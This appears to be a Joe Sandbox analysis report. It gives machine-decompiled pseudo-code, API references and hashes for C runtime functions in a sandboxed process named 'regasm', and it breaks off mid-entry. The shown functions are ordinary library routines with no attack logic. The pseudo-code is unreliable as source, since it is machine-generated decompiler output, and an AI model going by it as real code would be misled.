                                                                                  				_t8 = E0040A19C(__ebx, __edi, __esi);
                                                                                  				_t23 =  *((intOrPtr*)(_t25 + 8));
                                                                                  				if(_t23 == 0) {
                                                                                  					L9:
                                                                                  					return E0040A1E1(_t8);
                                                                                  				}
                                                                                  				if( *0x58e564 != 3) {
                                                                                  					_push(_t23);
                                                                                  					L7:
                                                                                  					if(HeapFree( *0x58df44, 0, ??) == 0) {
                                                                                  						_t10 = E00407567();
                                                                                  						 *_t10 = E00407525(GetLastError());
                                                                                  					}
                                                                                  					goto L9;
                                                                                  				}
                                                                                  				E0040D6F9(__ebx, __edi, 4);
                                                                                  				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
                                                                                  				_t13 = E0040D72C(_t23);
                                                                                  				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
                                                                                  				if(_t13 != 0) {
                                                                                  					_push(_t23);
                                                                                  					_push(_t13);
                                                                                  					E0040D75C();
                                                                                  				}
                                                                                  				 *(_t25 - 4) = 0xfffffffe;
                                                                                  				_t8 = E00406FFA();
                                                                                  				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
                                                                                  					goto L9;
                                                                                  				} else {
                                                                                  					_push( *((intOrPtr*)(_t25 + 8)));
                                                                                  					goto L7;
                                                                                  				}
                                                                                  			}







                                                                                  0x00406fa4
                                                                                  0x00406fa6
                                                                                  0x00406fab
                                                                                  0x00406fb0
                                                                                  0x00406fb5
                                                                                  0x0040702c
                                                                                  0x00407031
                                                                                  0x00407031
                                                                                  0x00406fbe
                                                                                  0x00407003
                                                                                  0x00407004
                                                                                  0x00407014
                                                                                  0x00407016
                                                                                  0x00407029
                                                                                  0x0040702b
                                                                                  0x00000000
                                                                                  0x00407014
                                                                                  0x00406fc2
                                                                                  0x00406fc8
                                                                                  0x00406fcd
                                                                                  0x00406fd3
                                                                                  0x00406fd8
                                                                                  0x00406fda
                                                                                  0x00406fdb
                                                                                  0x00406fdc
                                                                                  0x00406fe2
                                                                                  0x00406fe3
                                                                                  0x00406fea
                                                                                  0x00406ff3
                                                                                  0x00000000
                                                                                  0x00406ff5
                                                                                  0x00406ff5
                                                                                  0x00000000
                                                                                  0x00406ff5

                                                                                  APIs
                                                                                  • __lock.LIBCMT ref: 00406FC2
                                                                                    • Part of subcall function 0040D6F9: __mtinitlocknum.LIBCMT ref: 0040D70F
                                                                                    • Part of subcall function 0040D6F9: __amsg_exit.LIBCMT ref: 0040D71B
                                                                                    • Part of subcall function 0040D6F9: EnterCriticalSection.KERNEL32(?,?,?,00415A0C,00000004,004198F0,0000000C,00410BB5,?,?,00000000,00000000,00000000,?,00408FF4,00000001), ref: 0040D723
                                                                                  • ___sbh_find_block.LIBCMT ref: 00406FCD
                                                                                  • ___sbh_free_block.LIBCMT ref: 00406FDC
                                                                                  • HeapFree.KERNEL32(00000000,?,004194F8), ref: 0040700C
                                                                                  • GetLastError.KERNEL32(?,00415A0C,00000004,004198F0,0000000C,00410BB5,?,?,00000000,00000000,00000000,?,00408FF4,00000001,00000214), ref: 0040701D
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.928849580.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000007.00000002.928841784.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.928960821.0000000000419000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.928968084.000000000041B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.929004607.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.929031157.000000000058D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.929042134.0000000000590000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_400000_regasm.jbxd
                                                                                  Similarity
                                                                                  • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                  • String ID:
                                                                                  • API String ID: 2714421763-0
                                                                                  • Opcode ID: 0a5b80e4a57d186ec9819fadd36d212f806b07cda4cba043c7801c3d391e36fa
                                                                                  • Instruction ID: bbaaae2d8fdb139c6abec89468dddfd638eb37c6bf5de62ccd2426cc5568bca3
                                                                                  • Opcode Fuzzy Hash: 0a5b80e4a57d186ec9819fadd36d212f806b07cda4cba043c7801c3d391e36fa
                                                                                  • Instruction Fuzzy Hash: 6A01A732D04302EADB216FB1AC06B5F3B609F05368F10013FF5047A1D1CA7C9941DA5E
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 20%
                                                                                  			E00409B9A(void* __ebx, intOrPtr* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                                  				void* __ebp;
                                                                                  				void* _t20;
                                                                                  				void* _t22;
                                                                                  				void* _t23;
                                                                                  				void* _t25;
                                                                                  				intOrPtr* _t26;
                                                                                  				void* _t27;
                                                                                  				void* _t28;
                                                                                  
                                                                                  				_t27 = __esi;
                                                                                  				_t26 = __edi;
                                                                                  				_t22 = __ebx;
                                                                                  				_t30 = _a20;
                                                                                  				if(_a20 != 0) {
                                                                                  					_push(_a20);
                                                                                  					_push(__ebx);
                                                                                  					_push(__esi);
                                                                                  					_push(_a4);
                                                                                  					E00409B08(__ebx, __edi, __esi, _t30);
                                                                                  					_t28 = _t28 + 0x10;
                                                                                  				}
                                                                                  				_t31 = _a28;
                                                                                  				_push(_a4);
                                                                                  				if(_a28 != 0) {
                                                                                  					_push(_a28);
                                                                                  				} else {
                                                                                  					_push(_t27);
                                                                                  				}
                                                                                  				E0040646D(_t23);
                                                                                  				_push( *_t26);
                                                                                  				_push(_a16);
                                                                                  				_push(_a12);
                                                                                  				_push(_t27);
                                                                                  				E00409585(_t22, _t25, _t26, _t27, _t31);
                                                                                  				_push(0x100);
                                                                                  				_push(_a24);
                                                                                  				_push(_a16);
                                                                                  				 *((intOrPtr*)(_t27 + 8)) =  *((intOrPtr*)(_t26 + 4)) + 1;
                                                                                  				_push(_a8);
                                                                                  				_push(_t27);
                                                                                  				_push(_a4);
                                                                                  				_t20 = E004097ED( *((intOrPtr*)(_t22 + 0xc)));
                                                                                  				if(_t20 != 0) {
                                                                                  					E00406434(_t20, _t27);
                                                                                  					return _t20;
                                                                                  				}
                                                                                  				return _t20;
                                                                                  			}











                                                                                  0x00409b9a
                                                                                  0x00409b9a
                                                                                  0x00409b9a
                                                                                  0x00409b9f
                                                                                  0x00409ba3
                                                                                  0x00409ba5
                                                                                  0x00409ba8
                                                                                  0x00409ba9
                                                                                  0x00409baa
                                                                                  0x00409bad
                                                                                  0x00409bb2
                                                                                  0x00409bb2
                                                                                  0x00409bb5
                                                                                  0x00409bb9
                                                                                  0x00409bbc
                                                                                  0x00409bc1
                                                                                  0x00409bbe
                                                                                  0x00409bbe
                                                                                  0x00409bbe
                                                                                  0x00409bc4
                                                                                  0x00409bc9
                                                                                  0x00409bcb
                                                                                  0x00409bce
                                                                                  0x00409bd1
                                                                                  0x00409bd2
                                                                                  0x00409bda
                                                                                  0x00409bdf
                                                                                  0x00409be3
                                                                                  0x00409be6
                                                                                  0x00409be9
                                                                                  0x00409bef
                                                                                  0x00409bf0
                                                                                  0x00409bf3
                                                                                  0x00409bfd
                                                                                  0x00409c01
                                                                                  0x00000000
                                                                                  0x00409c01
                                                                                  0x00409c07

                                                                                  APIs
                                                                                  • ___BuildCatchObject.LIBCMT ref: 00409BAD
                                                                                    • Part of subcall function 00409B08: ___BuildCatchObjectHelper.LIBCMT ref: 00409B3E
                                                                                  • _UnwindNestedFrames.LIBCMT ref: 00409BC4
                                                                                  • ___FrameUnwindToState.LIBCMT ref: 00409BD2
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.928849580.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000007.00000002.928841784.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.928960821.0000000000419000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.928968084.000000000041B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.929004607.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.929031157.000000000058D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.929042134.0000000000590000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_400000_regasm.jbxd
                                                                                  Similarity
                                                                                  • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                                  • String ID: csm
                                                                                  • API String ID: 2163707966-1018135373
                                                                                  • Opcode ID: 2e054fd92a6b3ff284ade2ca4496fd9458ee2d6b36d2db4687d4f636c3eb7a12
                                                                                  • Instruction ID: 702bc1d2aefc8149930260568653852aea75747ddcf1e8b3be139b9ef950f4da
                                                                                  • Opcode Fuzzy Hash: 2e054fd92a6b3ff284ade2ca4496fd9458ee2d6b36d2db4687d4f636c3eb7a12
                                                                                  • Instruction Fuzzy Hash: 8B012471400109BBDF226F52DC45EEB7E6AFF08354F008026FC18251A2D73AA9B1DBA9
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 65%
                                                                                  			E00408501() {
                                                                                  				signed long long _v12;
                                                                                  				signed int _v20;
                                                                                  				signed long long _v28;
                                                                                  				signed char _t8;
                                                                                  
                                                                                  				_t8 = GetModuleHandleA("KERNEL32");
                                                                                  				if(_t8 == 0) {
                                                                                  					L6:
                                                                                  					_v20 =  *0x4017c0;
                                                                                  					_v28 =  *0x4017b8;
                                                                                  					asm("fsubr qword [ebp-0x18]");
                                                                                  					_v12 = _v28 / _v20 * _v20;
                                                                                  					asm("fld1");
                                                                                  					asm("fcomp qword [ebp-0x8]");
                                                                                  					asm("fnstsw ax");
                                                                                  					if((_t8 & 0x00000005) != 0) {
                                                                                  						return 0;
                                                                                  					} else {
                                                                                  						return 1;
                                                                                  					}
                                                                                  				} else {
                                                                                  					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
                                                                                  					if(__eax == 0) {
                                                                                  						goto L6;
                                                                                  					} else {
                                                                                  						_push(0);
                                                                                  						return __eax;
                                                                                  					}
                                                                                  				}
                                                                                  			}







                                                                                  0x00408506
                                                                                  0x0040850e
                                                                                  0x00408525
                                                                                  0x004084d1
                                                                                  0x004084da
                                                                                  0x004084e6
                                                                                  0x004084e9
                                                                                  0x004084ec
                                                                                  0x004084ee
                                                                                  0x004084f1
                                                                                  0x004084f6
                                                                                  0x00408500
                                                                                  0x004084f8
                                                                                  0x004084fc
                                                                                  0x004084fc
                                                                                  0x00408510
                                                                                  0x00408516
                                                                                  0x0040851e
                                                                                  0x00000000
                                                                                  0x00408520
                                                                                  0x00408520
                                                                                  0x00408524
                                                                                  0x00408524
                                                                                  0x0040851e

                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(KERNEL32,00406061), ref: 00408506
                                                                                  • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00408516
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.928849580.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000007.00000002.928841784.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.928960821.0000000000419000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.928968084.000000000041B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.929004607.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.929031157.000000000058D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.929042134.0000000000590000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_400000_regasm.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressHandleModuleProc
                                                                                  • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                  • API String ID: 1646373207-3105848591
                                                                                  • Opcode ID: 17f048e23962292a1eb6bbbcba5036306d3e54419b780e9122e5974eeb1f3a39
                                                                                  • Instruction ID: d3744924c0c1c05b711fa9aaf9638fb7b1d8fc90f205782c585901a01f367d61
                                                                                  • Opcode Fuzzy Hash: 17f048e23962292a1eb6bbbcba5036306d3e54419b780e9122e5974eeb1f3a39
                                                                                  • Instruction Fuzzy Hash: 3CF03630A10509D2DB001BA1AE4D7AF7AB8FB85741F9105A9D1D5F11D4EF348075925A
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 58%
                                                                                  			E00405D45() {
                                                                                  				intOrPtr _v16;
                                                                                  				void* _v28;
                                                                                  				void* _v64;
                                                                                  				void* _v104;
                                                                                  				void* __esi;
                                                                                  				void* _t17;
                                                                                  				intOrPtr* _t19;
                                                                                  				void* _t20;
                                                                                  				void* _t21;
                                                                                  				intOrPtr* _t22;
                                                                                  				void* _t24;
                                                                                  
                                                                                  				_push(0x44);
                                                                                  				E00406DBA(E0041702C, _t17, _t20, _t21);
                                                                                  				E004053AE(_t24 - 0x28, _t20, "invalid string position");
                                                                                  				 *(_t24 - 4) =  *(_t24 - 4) & 0x00000000;
                                                                                  				_t19 = _t24 - 0x50;
                                                                                  				E00405CBE(_t19, _t24 - 0x28);
                                                                                  				E004063E8(_t24 - 0x50, 0x4193e8);
                                                                                  				asm("int3");
                                                                                  				_push(_t24);
                                                                                  				_push(_t21);
                                                                                  				_push(_v16);
                                                                                  				_t22 = _t19;
                                                                                  				E00405418(_t19);
                                                                                  				 *_t22 = 0x401724;
                                                                                  				return _t22;
                                                                                  			}














                                                                                  0x00405d45
                                                                                  0x00405d4c
                                                                                  0x00405d59
                                                                                  0x00405d5e
                                                                                  0x00405d66
                                                                                  0x00405d69
                                                                                  0x00405d77
                                                                                  0x00405d7c
                                                                                  0x00405d7f
                                                                                  0x00405d82
                                                                                  0x00405d83
                                                                                  0x00405d86
                                                                                  0x00405d88
                                                                                  0x00405d8d
                                                                                  0x00405d97

                                                                                  APIs
                                                                                  • __EH_prolog3.LIBCMT ref: 00405D4C
                                                                                  • __CxxThrowException@8.LIBCMT ref: 00405D77
                                                                                    • Part of subcall function 004063E8: RaiseException.KERNEL32(?,?,004063E7,?,?,?,?,.K@,004063E7,?,00419080,0058DA94,?,00404B2E,?), ref: 0040642A
                                                                                    • Part of subcall function 00405418: __EH_prolog.LIBCMT ref: 0040541D
                                                                                    • Part of subcall function 00405418: std::exception::exception.LIBCMT ref: 0040542E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.928849580.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000007.00000002.928841784.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.928960821.0000000000419000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.928968084.000000000041B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.929004607.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.929031157.000000000058D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.929042134.0000000000590000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_400000_regasm.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExceptionException@8H_prologH_prolog3RaiseThrowstd::exception::exception
                                                                                  • String ID: invalid string position$\@
                                                                                  • API String ID: 3550033118-3129772048
                                                                                  • Opcode ID: de3df68d999ac70580f640605b49dc3e2ec989de67139ecc82ced30a0970d0f3
                                                                                  • Instruction ID: 20b032b5d1e3eb5bd4229075f61677b59825f92a811324aa036b7052f22daf7f
                                                                                  • Opcode Fuzzy Hash: de3df68d999ac70580f640605b49dc3e2ec989de67139ecc82ced30a0970d0f3
                                                                                  • Instruction Fuzzy Hash: BBF03072A00218A7CB10FBD1C841ACEBB6CEF14765F14003BF601B71D1DAB89950CBA8
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 81%
                                                                                  			E004053DF(void* __edi) {
                                                                                  				intOrPtr* _t26;
                                                                                  				intOrPtr _t30;
                                                                                  				intOrPtr* _t34;
                                                                                  				void* _t36;
                                                                                  
                                                                                  				E0040681C(E00416FAE, _t36);
                                                                                  				E004053AE(_t36 - 0x28, __edi, "vector<T> too long");
                                                                                  				 *(_t36 - 4) =  *(_t36 - 4) & 0x00000000;
                                                                                  				_t26 = _t36 - 0x50;
                                                                                  				E00405369(_t26, _t36 - 0x28);
                                                                                  				E004063E8(_t36 - 0x50, 0x41918c);
                                                                                  				asm("int3");
                                                                                  				E0040681C(E00416FC0, _t36);
                                                                                  				_push(_t26);
                                                                                  				_push(__edi);
                                                                                  				_t30 =  *((intOrPtr*)(_t36 + 8));
                                                                                  				_t34 = _t26;
                                                                                  				 *((intOrPtr*)(_t36 - 0x10)) = _t34;
                                                                                  				E00405E1B(_t26, _t30);
                                                                                  				 *(_t36 - 4) =  *(_t36 - 4) & 0x00000000;
                                                                                  				_t31 = _t30 + 0xc;
                                                                                  				 *_t34 = 0x4016e8;
                                                                                  				E004051DC(_t34 + 0xc, _t30 + 0xc, _t31);
                                                                                  				 *[fs:0x0] =  *((intOrPtr*)(_t36 - 0xc));
                                                                                  				return _t34;
                                                                                  			}







                                                                                  0x004053e4
                                                                                  0x004053f4
                                                                                  0x004053f9
                                                                                  0x00405401
                                                                                  0x00405404
                                                                                  0x00405412
                                                                                  0x00405417
                                                                                  0x0040541d
                                                                                  0x00405422
                                                                                  0x00405424
                                                                                  0x00405425
                                                                                  0x00405428
                                                                                  0x0040542b
                                                                                  0x0040542e
                                                                                  0x00405433
                                                                                  0x00405437
                                                                                  0x0040543e
                                                                                  0x00405444
                                                                                  0x00405450
                                                                                  0x00405458

                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 004053E4
                                                                                  • std::bad_exception::bad_exception.LIBCMT ref: 00405404
                                                                                  • __CxxThrowException@8.LIBCMT ref: 00405412
                                                                                    • Part of subcall function 004063E8: RaiseException.KERNEL32(?,?,004063E7,?,?,?,?,.K@,004063E7,?,00419080,0058DA94,?,00404B2E,?), ref: 0040642A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.928849580.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000007.00000002.928841784.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.928960821.0000000000419000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.928968084.000000000041B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.929004607.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.929031157.000000000058D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.929042134.0000000000590000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_400000_regasm.jbxd
                                                                                  Similarity
                                                                                  • API ID: ExceptionException@8H_prologRaiseThrowstd::bad_exception::bad_exception
                                                                                  • String ID: vector<T> too long
                                                                                  • API String ID: 1606262581-3788999226
                                                                                  • Opcode ID: c011fd7e01b9251a4b4977cc721a51060e2d47861a00d63ee6e6f7458d70a710
                                                                                  • Instruction ID: 4b6a409f9a3b717a70a8404fd5e2eecc7be03f270ba5a885c8f770584f9214a0
                                                                                  • Opcode Fuzzy Hash: c011fd7e01b9251a4b4977cc721a51060e2d47861a00d63ee6e6f7458d70a710
                                                                                  • Instruction Fuzzy Hash: D6D017B2C4020CA6CB04FBE1C846BDE7338AB14348F14803FE402B20D1DBBC96589AA8
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E00411785(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                  				intOrPtr _v8;
                                                                                  				signed int _v12;
                                                                                  				char _v20;
                                                                                  				signed int _t54;
                                                                                  				intOrPtr _t56;
                                                                                  				int _t57;
                                                                                  				int _t58;
                                                                                  				signed short* _t59;
                                                                                  				short* _t60;
                                                                                  				int _t65;
                                                                                  				char* _t72;
                                                                                  
                                                                                  				_t72 = _a8;
                                                                                  				if(_t72 == 0 || _a12 == 0) {
                                                                                  					L5:
                                                                                  					return 0;
                                                                                  				} else {
                                                                                  					if( *_t72 != 0) {
                                                                                  						E00407915( &_v20, _a16);
                                                                                  						if( *((intOrPtr*)(_v20 + 0x14)) != 0) {
                                                                                  							if(E004118B6( *_t72 & 0x000000ff,  &_v20) == 0) {
                                                                                  								if(MultiByteToWideChar( *(_v20 + 4), 9, _t72, 1, _a4, 0 | _a4 != 0x00000000) != 0) {
                                                                                  									L10:
                                                                                  									if(_v8 != 0) {
                                                                                  										 *(_v12 + 0x70) =  *(_v12 + 0x70) & 0xfffffffd;
                                                                                  									}
                                                                                  									return 1;
                                                                                  								}
                                                                                  								L21:
                                                                                  								_t54 = E00407567();
                                                                                  								 *_t54 = 0x2a;
                                                                                  								if(_v8 != 0) {
                                                                                  									_t54 = _v12;
                                                                                  									 *(_t54 + 0x70) =  *(_t54 + 0x70) & 0xfffffffd;
                                                                                  								}
                                                                                  								return _t54 | 0xffffffff;
                                                                                  							}
                                                                                  							_t56 = _v20;
                                                                                  							_t65 =  *(_t56 + 0xac);
                                                                                  							if(_t65 <= 1 || _a12 < _t65) {
                                                                                  								L17:
                                                                                  								if(_a12 <  *(_t56 + 0xac) || _t72[1] == 0) {
                                                                                  									goto L21;
                                                                                  								} else {
                                                                                  									goto L19;
                                                                                  								}
                                                                                  							} else {
                                                                                  								_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
                                                                                  								_t56 = _v20;
                                                                                  								if(_t58 != 0) {
                                                                                  									L19:
                                                                                  									_t57 =  *(_t56 + 0xac);
                                                                                  									if(_v8 == 0) {
                                                                                  										return _t57;
                                                                                  									}
                                                                                  									 *(_v12 + 0x70) =  *(_v12 + 0x70) & 0xfffffffd;
                                                                                  									return _t57;
                                                                                  								}
                                                                                  								goto L17;
                                                                                  							}
                                                                                  						}
                                                                                  						_t59 = _a4;
                                                                                  						if(_t59 != 0) {
                                                                                  							 *_t59 =  *_t72 & 0x000000ff;
                                                                                  						}
                                                                                  						goto L10;
                                                                                  					} else {
                                                                                  						_t60 = _a4;
                                                                                  						if(_t60 != 0) {
                                                                                  							 *_t60 = 0;
                                                                                  						}
                                                                                  						goto L5;
                                                                                  					}
                                                                                  				}
                                                                                  			}














                                                                                  0x0041178f
                                                                                  0x00411796
                                                                                  0x004117ad
                                                                                  0x00000000
                                                                                  0x0041179d
                                                                                  0x0041179f
                                                                                  0x004117b9
                                                                                  0x004117c4
                                                                                  0x004117f6
                                                                                  0x00411894
                                                                                  0x004117d4
                                                                                  0x004117d7
                                                                                  0x004117dc
                                                                                  0x004117dc
                                                                                  0x00000000
                                                                                  0x004117e2
                                                                                  0x00411856
                                                                                  0x00411856
                                                                                  0x0041185b
                                                                                  0x00411864
                                                                                  0x00411866
                                                                                  0x00411869
                                                                                  0x00411869
                                                                                  0x00000000
                                                                                  0x0041186d
                                                                                  0x004117f8
                                                                                  0x004117fb
                                                                                  0x00411804
                                                                                  0x0041182b
                                                                                  0x00411834
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x0041180b
                                                                                  0x0041181e
                                                                                  0x00411826
                                                                                  0x00411829
                                                                                  0x0041183b
                                                                                  0x0041183b
                                                                                  0x00411844
                                                                                  0x004117b2
                                                                                  0x004117b2
                                                                                  0x0041184d
                                                                                  0x00000000
                                                                                  0x0041184d
                                                                                  0x00000000
                                                                                  0x00411829
                                                                                  0x00411804
                                                                                  0x004117c6
                                                                                  0x004117cb
                                                                                  0x004117d1
                                                                                  0x004117d1
                                                                                  0x00000000
                                                                                  0x004117a1
                                                                                  0x004117a1
                                                                                  0x004117a6
                                                                                  0x004117aa
                                                                                  0x004117aa
                                                                                  0x00000000
                                                                                  0x004117a6
                                                                                  0x0041179f

                                                                                  APIs
                                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004117B9
                                                                                  • __isleadbyte_l.LIBCMT ref: 004117ED
                                                                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000,?,?,?,00000000,?,00000000,00000000), ref: 0041181E
                                                                                  • MultiByteToWideChar.KERNEL32(?,00000009,?,00000001,00000000,00000000,?,?,?,00000000,?,00000000,00000000), ref: 0041188C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.928849580.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000007.00000002.928841784.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.928960821.0000000000419000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.928968084.000000000041B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.929004607.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.929031157.000000000058D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.929042134.0000000000590000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_400000_regasm.jbxd
                                                                                  Similarity
                                                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                  • String ID:
                                                                                  • API String ID: 3058430110-0
                                                                                  • Opcode ID: 2a48c5ddbc42022273d1a94f028fcf7866d7b8c34ea8256a8264cf8830482db9
                                                                                  • Instruction ID: a30b4cc604c00014cef412559b7234b84b838742f7225375a318c7bf94404aee
                                                                                  • Opcode Fuzzy Hash: 2a48c5ddbc42022273d1a94f028fcf7866d7b8c34ea8256a8264cf8830482db9
                                                                                  • Instruction Fuzzy Hash: 3D31C031A00246EFDB20EF64C8809EE3BA5AF01310F18856BE6659B3E1D734DD80DB59
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  C-Code - Quality: 100%
                                                                                  			E004083CC(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                                  				intOrPtr _t25;
                                                                                  				void* _t26;
                                                                                  				void* _t28;
                                                                                  
                                                                                  				_t25 = _a16;
                                                                                  				if(_t25 == 0x65 || _t25 == 0x45) {
                                                                                  					_t26 = E00407CBD(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                  					goto L9;
                                                                                  				} else {
                                                                                  					_t34 = _t25 - 0x66;
                                                                                  					if(_t25 != 0x66) {
                                                                                  						__eflags = _t25 - 0x61;
                                                                                  						if(_t25 == 0x61) {
                                                                                  							L7:
                                                                                  							_t26 = E00407DAD(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                  						} else {
                                                                                  							__eflags = _t25 - 0x41;
                                                                                  							if(__eflags == 0) {
                                                                                  								goto L7;
                                                                                  							} else {
                                                                                  								_t26 = E004082D2(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                                                                                  							}
                                                                                  						}
                                                                                  						L9:
                                                                                  						return _t26;
                                                                                  					} else {
                                                                                  						return E00408217(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
                                                                                  					}
                                                                                  				}
                                                                                  			}






                                                                                  0x004083d1
                                                                                  0x004083d7
                                                                                  0x0040844a
                                                                                  0x00000000
                                                                                  0x004083de
                                                                                  0x004083de
                                                                                  0x004083e1
                                                                                  0x004083fc
                                                                                  0x004083ff
                                                                                  0x0040841f
                                                                                  0x00408431
                                                                                  0x00408401
                                                                                  0x00408401
                                                                                  0x00408404
                                                                                  0x00000000
                                                                                  0x00408406
                                                                                  0x00408418
                                                                                  0x00408418
                                                                                  0x00408404
                                                                                  0x0040844f
                                                                                  0x00408453
                                                                                  0x004083e3
                                                                                  0x004083fb
                                                                                  0x004083fb
                                                                                  0x004083e1

                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.928849580.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000007.00000002.928841784.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
